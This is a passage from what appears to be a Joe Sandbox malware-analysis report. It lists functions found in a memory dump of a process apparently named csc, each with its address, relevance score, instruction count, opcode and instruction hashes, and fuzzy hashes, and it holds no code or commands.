                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_5370000_csc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 1b0714445f287c21d11a46f51779311255a99f7979210fc28e6518d483c8e1c6
                                                      • Instruction ID: 121e7dd0820f336b2f55ac3e3bdf34f6725dddcf784fcf8402941e8f5a70de9b
                                                      • Opcode Fuzzy Hash: 1b0714445f287c21d11a46f51779311255a99f7979210fc28e6518d483c8e1c6
                                                      • Instruction Fuzzy Hash: 3AE1C172A08341CFC715CF28C491A6ABBE5FF89304F098A6DF9958B351DB71E905CB92
                                                      Function 053AD7E0 Relevance: .3, Instructions: 342COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_5370000_csc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: eb67f81f6ce0d79b1ba84c4ffd8fa35d7106a722be59448be3ba9b277ec03813
                                                      • Instruction ID: 2cf17018ee4ac9780dc340e7a490638f9f5f8c77f72a439bb7960953f1a55a06
                                                      • Opcode Fuzzy Hash: eb67f81f6ce0d79b1ba84c4ffd8fa35d7106a722be59448be3ba9b277ec03813
                                                      • Instruction Fuzzy Hash: 60C1B172A042159BDF28CF58C845BEEB7B6FF84310F28866AD915AB7C4D774E941CB80
                                                      Function 053BF460 Relevance: .3, Instructions: 321COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_5370000_csc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: ad1e7d531be7b65f7a4b915a42bf65b4b1cee599ccff02ccc6801913ca36986b
                                                      • Instruction ID: 75ddd5328d0ac624df79c8131ae37dca581c33e3ce4ec76b9a77635bd7a884a7
                                                      • Opcode Fuzzy Hash: ad1e7d531be7b65f7a4b915a42bf65b4b1cee599ccff02ccc6801913ca36986b
                                                      • Instruction Fuzzy Hash: E7C12572A042258BEB28CF18C8D5BF977A6FF44714F15515AEE429FBA1DBF08A40CB50
                                                      Function 053B0535 Relevance: .3, Instructions: 300COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_5370000_csc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                                      • Instruction ID: 0a158be5cc533f5308d0d41d30634551fe72067e68cdf14abebe1023a8c98de5
                                                      • Opcode Fuzzy Hash: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                                      • Instruction Fuzzy Hash: 15B1C331704645AFEB15DB64C858BFFB7FAEF84200F2405AAD65297A81D770DA41CB90
                                                      Function 053C90DB Relevance: .3, Instructions: 287COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_5370000_csc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: ec750e66d2c808e155dba86cc09612bde53a9bc666e3d6a9d2c2e5cd03caa7cd
                                                      • Instruction ID: f664f2ec59c8ff0730a7a98238791f2256825c694a23c676b0e6203381a84859
                                                      • Opcode Fuzzy Hash: ec750e66d2c808e155dba86cc09612bde53a9bc666e3d6a9d2c2e5cd03caa7cd
                                                      • Instruction Fuzzy Hash: B0A13A71A04215AFEB169FA4CC45FEF7BB9AF45750F1101A4FA01AB2A0D7B5AD108BA0
                                                      Function 0539C427 Relevance: .3, Instructions: 280COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_5370000_csc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: dfa0ab4d9bbdd749f29d35486e32525ad3bf70ec9cfa7049414450ecc1be505b
                                                      • Instruction ID: 7f511d2ffa3b50c94f16d7ab34cf5cb8571fc8a3b118a544e51df41b43794bf2
                                                      • Opcode Fuzzy Hash: dfa0ab4d9bbdd749f29d35486e32525ad3bf70ec9cfa7049414450ecc1be505b
                                                      • Instruction Fuzzy Hash: 6DB162B0B042698BDB68DF55C894BA9B3F6FF44700F0485E9D54AE7281EB70DD85CB20
                                                      Function 053CE5E7 Relevance: .3, Instructions: 278COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_5370000_csc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 9d2671a750a365fbe0b09ddd4688f05fad86c30ccf54c012c748afd096d11c7e
                                                      • Instruction ID: 48c35a4a0943de12d2024186920325a0e589f05421aac6b96eed8a1f36e722b2
                                                      • Opcode Fuzzy Hash: 9d2671a750a365fbe0b09ddd4688f05fad86c30ccf54c012c748afd096d11c7e
                                                      • Instruction Fuzzy Hash: FCA11631E14624AFDB32DB58C849FEEBBB9BB01714F1501BAEA01AB2D0D7749D44CB91
                                                      Function 053E0185 Relevance: .3, Instructions: 276COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_5370000_csc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 0294f8899afec7f3a326fed25d8d0feb0e8fde5d17ddd30c4818236f3b40b96c
                                                      • Instruction ID: 613bf955b5ef46b023a9e2e812658e327a0d2314e1c71855d272dd8a8184f628
                                                      • Opcode Fuzzy Hash: 0294f8899afec7f3a326fed25d8d0feb0e8fde5d17ddd30c4818236f3b40b96c
                                                      • Instruction Fuzzy Hash: DDA1A471B0062ADBDB28DF65C599BBAB7F6FF44314F04402AEA45A72C1DBB4E811CB50
                                                      Function 05474500 Relevance: .3, Instructions: 275COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_5370000_csc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 311d1a435caa259dc0465b67b8923a279928a8d9b74982b69adbc3d83442c22b
                                                      • Instruction ID: 63b519e97234fb8af60334ff25b7edbf8a97d18e435ceb7938c6309018e9085d
                                                      • Opcode Fuzzy Hash: 311d1a435caa259dc0465b67b8923a279928a8d9b74982b69adbc3d83442c22b
                                                      • Instruction Fuzzy Hash: 36A1CA72A14215AFCB11DF14C984BEABBEAFF48304F02096AF5859B650D374ED01CB91
                                                      Function 053A9486 Relevance: .3, Instructions: 259COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_5370000_csc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: ed8201d6c68a75d5552014b1c3cf473fc6514f90258cdf38765bc23a8b4946ba
                                                      • Instruction ID: c00b22fbcc83581274bc83078ea69a41a4a572aa53679e9a232731fef97c73d5
                                                      • Opcode Fuzzy Hash: ed8201d6c68a75d5552014b1c3cf473fc6514f90258cdf38765bc23a8b4946ba
                                                      • Instruction Fuzzy Hash: F1B14E776042068FCF29CF18D486BB977F1FF54354F24455AE822AB299DBB1D842CB50
                                                      Function 053A1131 Relevance: .3, Instructions: 259COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_5370000_csc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 5e98cfed6d70155769176b0bd2eb77d2dc5c44103ccc2f2f1a6538ed28379253
                                                      • Instruction ID: abe9727f4783571d315774ae137aad3ed1a68125c2c016731f66bebb07b69898
                                                      • Opcode Fuzzy Hash: 5e98cfed6d70155769176b0bd2eb77d2dc5c44103ccc2f2f1a6538ed28379253
                                                      • Instruction Fuzzy Hash: 51B10175A093409FD364CF28C580A6AFBE1BB88304F184A6EF99AD7352D771E945CB42
                                                      Function 0545B52F Relevance: .2, Instructions: 222COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_5370000_csc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 14aa7f2389c0c2f4a5e39dfbb016f189343e77270b8e137ddafeb974bf5cdc5c
                                                      • Instruction ID: aa847c35563d448b6a1cbfd36f8e97c57dc20a81ac938123e1421ce0f5e57963
                                                      • Opcode Fuzzy Hash: 14aa7f2389c0c2f4a5e39dfbb016f189343e77270b8e137ddafeb974bf5cdc5c
                                                      • Instruction Fuzzy Hash: 57716C35A0421A9BCB24CE65C480AFFB7E6FF44760F59419BEC42AB342E734D9458B90
                                                      Function 053CD090 Relevance: .2, Instructions: 217COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_5370000_csc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 2f57846fa6853ce2eba42e0856427c3c37140fe7ac7bc1e87bfd5d4bd44f03bd
                                                      • Instruction ID: 9df94eee82b956addd0c29ed2c58c0db5af9d6d1410608b4c8fdeb0adf1584d8
                                                      • Opcode Fuzzy Hash: 2f57846fa6853ce2eba42e0856427c3c37140fe7ac7bc1e87bfd5d4bd44f03bd
                                                      • Instruction Fuzzy Hash: 32819F72E0415A9BDF14DF58C9807EEB7B6FF84300F2589BFD815A7380D631A9618B91
                                                      Function 053BC640 Relevance: .2, Instructions: 206COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_5370000_csc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: b7379e7a3d8b44d685f6834746679678b67834506cf445dbb81ea55884b98a25
                                                      • Instruction ID: 8c70bb1c00c3aad11fc26f6437748322ec7aeafab65a89fe66f4d9910e0d89c2
                                                      • Opcode Fuzzy Hash: b7379e7a3d8b44d685f6834746679678b67834506cf445dbb81ea55884b98a25
                                                      • Instruction Fuzzy Hash: A271EE7090422ADFCB25CF58C591BFEBBB6FF58700F24516AE942AB790D7B09801CB90
                                                      Function 053B260B Relevance: .2, Instructions: 201COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_5370000_csc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 3531343e2abb4dfc70697cb79c87cf70bb6a749dc1aededde4c0c3ec1e08dda8
                                                      • Instruction ID: c2fe3609708c2d262b07ae7e52902625258fb590ff9177df26f0b38065a55510
                                                      • Opcode Fuzzy Hash: 3531343e2abb4dfc70697cb79c87cf70bb6a749dc1aededde4c0c3ec1e08dda8
                                                      • Instruction Fuzzy Hash: 1671E0757042418FE311DF28C484BA7B7E6FF84210F0586AAF955CBB52EBB4D845CB91
                                                      Function 0546903E Relevance: .2, Instructions: 186COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_5370000_csc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 89b0e89c7d208059404d4b29fb7ea04307bc3039984763d757288950f0ed509e
                                                      • Instruction ID: 5440cdf0941b45ddaaff39690a4d1f21372ad8e38db361c908cb350cc3b7e0c0
                                                      • Opcode Fuzzy Hash: 89b0e89c7d208059404d4b29fb7ea04307bc3039984763d757288950f0ed509e
                                                      • Instruction Fuzzy Hash: 03619D71704615AFD719DF69C888BEBBBA9FF88710F004A1EF85987240DB70E915CB92
                                                      Function 053A7703 Relevance: .2, Instructions: 179COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_5370000_csc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 4366392e2b08944889444348c5ab7bd8c99e99ba335a44a82c245d5a8cbd2246
                                                      • Instruction ID: 8bd4ea47a00b528fd7e65efbab5a7cc69a8bf44c22dc3d7e70a9fa5b53c65a70
                                                      • Opcode Fuzzy Hash: 4366392e2b08944889444348c5ab7bd8c99e99ba335a44a82c245d5a8cbd2246
                                                      • Instruction Fuzzy Hash: 2E614175B05505AFDB19DF68C485AEDFBBAFF84200F24826AE519A7340DB70A941CB90
                                                      Function 053DB570 Relevance: .2, Instructions: 161COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_5370000_csc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: b785044d5579ee695d996bc5afb43562ce16ce44351cd90c0bc50c1e33d14dc6
                                                      • Instruction ID: ad2a1b212f6b6b4f27034f056b9be9f9deb4262bf725ee08fa35b1293fc5bcc1
                                                      • Opcode Fuzzy Hash: b785044d5579ee695d996bc5afb43562ce16ce44351cd90c0bc50c1e33d14dc6
                                                      • Instruction Fuzzy Hash: 6951C1B12042549FD725EF24C88AFAB7BE8FB85764F10066EFD1597291DB30D801CBA9
                                                      Function 0541D5D0 Relevance: .2, Instructions: 161COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_5370000_csc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 421d61e5bc4c825cfb3b344d513b1230fd482de7481e25e13c6dc44851e8f620
                                                      • Instruction ID: 161c9a82e8894bff66d0334873a9e12f9c8cef023d0ca193bce9974bc9deb97e
                                                      • Opcode Fuzzy Hash: 421d61e5bc4c825cfb3b344d513b1230fd482de7481e25e13c6dc44851e8f620
                                                      • Instruction Fuzzy Hash: DB51DFB6A042129BCB11AF648C44AFBB7E6FF88680F04086AFD55C7251E734C856C7A6
                                                      Function 053C95DA Relevance: .2, Instructions: 160COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_5370000_csc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: b600cd283040ccdf8691d6b7bf5145daadc9c102d56ed152109a3b74c4ac311d
                                                      • Instruction ID: ba4609878c169aac7f6f902a19062c80039fa38f49d1b10bde3da26095509e11
                                                      • Opcode Fuzzy Hash: b600cd283040ccdf8691d6b7bf5145daadc9c102d56ed152109a3b74c4ac311d
                                                      • Instruction Fuzzy Hash: 47518B71E04219ABEB219FA4CC85BEEBBB9FF05310F20017AE595A7191DBB1AC54DF10
                                                      Function 053B3740 Relevance: .2, Instructions: 159COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_5370000_csc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 65e19ab220c99ee342df4508227813c46d3b7d83c68cf8ade6a503ebc521aa57
                                                      • Instruction ID: dba19d35ef5b6c92bd84faaf36040f920b5d66978e4baf00ac8fba747e4581c6
                                                      • Opcode Fuzzy Hash: 65e19ab220c99ee342df4508227813c46d3b7d83c68cf8ade6a503ebc521aa57
                                                      • Instruction Fuzzy Hash: 45512175E00666AFE712CF68C485AE9B7B1FF04310F014A65E955CBB40E7B4E995CBC0
                                                      Function 053DE443 Relevance: .2, Instructions: 158COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_5370000_csc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 5751613ef004e419d3f83dc519ae653dd58e85dce2de94b6b08b0a4e47c378a5
                                                      • Instruction ID: d7f45096c069ff6dfdd57a357885261dffc8894c10ad141dbba26de61f4cfaa3
                                                      • Opcode Fuzzy Hash: 5751613ef004e419d3f83dc519ae653dd58e85dce2de94b6b08b0a4e47c378a5
                                                      • Instruction Fuzzy Hash: DA518272200A14DFDB21DFA4D984EAAB7FEFF04780F50086AE6469B660D770ED51DB60
                                                      Function 053A7152 Relevance: .2, Instructions: 158COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_5370000_csc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 2bb45759572dd81fe42b821f586ea2a2214db1b6ef69c2cab9123ebbdcf49798
                                                      • Instruction ID: 35829e3cba80ac7722708d46ce635a7b98c36ff0984abb2f16335440c6efa18e
                                                      • Opcode Fuzzy Hash: 2bb45759572dd81fe42b821f586ea2a2214db1b6ef69c2cab9123ebbdcf49798
                                                      • Instruction Fuzzy Hash: C551C332A04605EFEB15DF64C988BBEBBF6FF44315F20416AE51397690EBB49901CB90
                                                      Function 053C45B1 Relevance: .2, Instructions: 156COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_5370000_csc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 0d00e1a585e90d849ff2aa0c284c489e35fe4af6d50ef2092e2439a8439fa3dd
                                                      • Instruction ID: d7dc93c782c5d646220e306f2f32b10fd00beaa98a1cc88a9c3aadb021e77403
                                                      • Opcode Fuzzy Hash: 0d00e1a585e90d849ff2aa0c284c489e35fe4af6d50ef2092e2439a8439fa3dd
                                                      • Instruction Fuzzy Hash: C6519A71E0421AABCF16DF94C450BEEBBB9AF44351F1440AAE911EB380D774EE44CBA4
                                                      Function 053A51ED Relevance: .1, Instructions: 149COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_5370000_csc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 5a21f16d412fefd4c832c29bce0a5f92afbcc6ad6da9f559937f86672c432dea
                                                      • Instruction ID: 9032fdadf0fd92e1f77e68b3c1deb06342533ed972d96e772ba9965d9a05692e
                                                      • Opcode Fuzzy Hash: 5a21f16d412fefd4c832c29bce0a5f92afbcc6ad6da9f559937f86672c432dea
                                                      • Instruction Fuzzy Hash: 10518B72B05215DFDF25DBA8D848BFEB7B5FF44314F140029E805E7281E7B8A8408B60
                                                      Function 053DF71F Relevance: .1, Instructions: 143COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_5370000_csc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 677cf94ba4333a05962ddbcf25893c4139b0f47e62d9ac4d410441f5c41be730
                                                      • Instruction ID: 0b53d863b4b2457004d674447f298af6f453e738c7f3e733f178bb9634adbc31
                                                      • Opcode Fuzzy Hash: 677cf94ba4333a05962ddbcf25893c4139b0f47e62d9ac4d410441f5c41be730
                                                      • Instruction Fuzzy Hash: AE4177B3D04229ABDB12EBE49884AFFB7BDAF04694F1501A6E901E7740D674DD01C7E4
                                                      Function 054735D7 Relevance: .1, Instructions: 139COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_5370000_csc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: b2c300d7f86a03933703e09635872856e70952263eb4647515a482bdea46eec2
                                                      • Instruction ID: 717f45cb11ed4951f864ec4523dae638f33a2c5b8a3604a2b01a3487bde35bb5
                                                      • Opcode Fuzzy Hash: b2c300d7f86a03933703e09635872856e70952263eb4647515a482bdea46eec2
                                                      • Instruction Fuzzy Hash: 33515A7160060AEFCB25CF14C580AE6BBB6FF45304F15C4AAE9089F362E371E946DB90
                                                      Function 053DA430 Relevance: .1, Instructions: 139COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_5370000_csc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 436b8622be49da77e1b2a6a079e850c98c3ee2ed85ba9fcd4a1220e1eb31c235
                                                      • Instruction ID: c41f5805daaa0c3dd693ae15c7efe53f754386bc05e74cf6f9ec70bbc1090004
                                                      • Opcode Fuzzy Hash: 436b8622be49da77e1b2a6a079e850c98c3ee2ed85ba9fcd4a1220e1eb31c235
                                                      • Instruction Fuzzy Hash: 5B41AF727542009BDB1DEF68A987FFAFB76AB54704F01046DFD029B640DBB2D810C665
                                                      Function 053AD534 Relevance: .1, Instructions: 138COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_5370000_csc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 34eeef2b042e4267b32397c37dbd888791b8c804a5177d5ddc66c909e235e755
                                                      • Instruction ID: 7e6b6291f8a751f63e9406335e9492fef06e17d3281deb7f48dfff361e46a09c
                                                      • Opcode Fuzzy Hash: 34eeef2b042e4267b32397c37dbd888791b8c804a5177d5ddc66c909e235e755
                                                      • Instruction Fuzzy Hash: 6351AB327086918FD721CF18C444BAA77A6FB44B54F5909BAF8068BB95DB78DC40CB61
                                                      Function 053D01F8 Relevance: .1, Instructions: 138COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_5370000_csc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: b09ef5e8c5a6093f77ac3bc69025598e09acdefa2a0f5274f0bca88859b2e4c1
                                                      • Instruction ID: 4f2ec797e2e1dc5cfbbc64883bca8b7522edebe2d80bb259c28e3a02f34ccd26
                                                      • Opcode Fuzzy Hash: b09ef5e8c5a6093f77ac3bc69025598e09acdefa2a0f5274f0bca88859b2e4c1
                                                      • Instruction Fuzzy Hash: 6841AE36E012149BCB18DF98D448AEEF7B5BF48B10F14415AE816E7640E775AD41CBB4
                                                      Function 053E2750 Relevance: .1, Instructions: 137COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_5370000_csc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: f9143dc9ab32c0c56755980999bbdd100a6c23c33ec6549c8632214e05dba9ed
                                                      • Instruction ID: b57f63a576a8163fa2935615dbb42f2f4f7d9e1184f29e2a3fe33eac787673b3
                                                      • Opcode Fuzzy Hash: f9143dc9ab32c0c56755980999bbdd100a6c23c33ec6549c8632214e05dba9ed
                                                      • Instruction Fuzzy Hash: 5A515B75A01219CFCB14CF99C580AAEF7B6FF84710F2881AAD816A7751D730AE42DBD0
                                                      Function 0541D1C0 Relevance: .1, Instructions: 135COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_5370000_csc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 0eb649ebbf3548d8df43d0789ceff5cfbc550e3c64e1c06ae1f98d8f26ebe946
                                                      • Instruction ID: 6c776a4e3e91df444a8ef16311ceacb6ee53c4892ddc338f80c5ad00dfd57000
                                                      • Opcode Fuzzy Hash: 0eb649ebbf3548d8df43d0789ceff5cfbc550e3c64e1c06ae1f98d8f26ebe946
                                                      • Instruction Fuzzy Hash: 35512AB1E04205DFCB18CF68C581AAABBF1FF48314B1485AED81A9B345E734E941CF94
                                                      Function 053A6154 Relevance: .1, Instructions: 133COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_5370000_csc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
